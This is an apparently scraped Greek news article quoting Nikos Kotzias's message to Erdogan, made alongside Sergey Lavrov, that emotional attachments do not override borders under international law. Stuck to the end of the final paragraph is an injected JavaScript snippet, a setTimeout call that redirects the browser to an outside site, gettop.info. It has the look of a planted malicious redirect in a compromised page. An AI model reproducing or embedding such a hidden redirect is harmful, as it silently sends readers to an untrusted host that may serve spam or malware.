Μήνυμα Κοτζιά σε Ερντογάν: Τα σύνορα της καρδιάς δεν είναι τα σύνορα του διεθνούς δικαίου

0
61

 

Μήνυμα με αποδέκτη τον Τούρκο Πρόεδρο Ρετζέπ Ταγίπ Ερντογάν έστειλε ο υπουργός Εξωτερικών Νίκος Κοτζιάς κατά τη διάρκεια των δηλώσεων του με τον υπουργό Εξωτερικών της Ρωσίας Σεργκέι Λαβρόφ.

«Η ιστορία της καρδιάς μας φτάνει μέχρι την Ινδία. Η ελληνική καρδιά περιλαμβάνει μέχρι και την Ινδία. Αλλά τα σύνορα της καρδιάς μας δεν είναι τα σύνορα του διεθνούς δικαίου» σημείωσε ο υπουργός Εξωτερικών Νίκος Κοτζιάς.

«Κάποιος μπορεί να ερωτευτεί και μια κυρία στη Χαβάη, στην Αυστραλία, κανείς δεν το απαγορεύει αυτό. Αλλά ο σεβασμός των συνόρων είναι υποχρεωτικός» πρόσθεσε.

Ο κ. Κοτζιάς έκανε ειδική αναφορά και στην Ιστορία, λέγοντας χαρακτηριστικά πως «πρέπει να είναι σχολείο και όχι φυλακή» και προσέθεσε: «Την Ιστορία πρέπει να την αντιμετωπίζει κανείς με σεβασμό και όχι με ασέβεια, έτσι όπως είναι στην πραγματικότητα και όχι με μια εκ των υστέρων μυθολογία».

Από τη μεριά του, ο Ρώσος υπουργός Εξωτερικών, αναφερόμενος στην ίδια ερώτηση, τόνισε ότι «η απάντηση είναι πολύ απλή: Σε όλα τα ζητήματα πρέπει να γίνεται σεβαστό το διεθνές δίκαιο που απορρέει από τις διεθνείς συμβάσεις». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here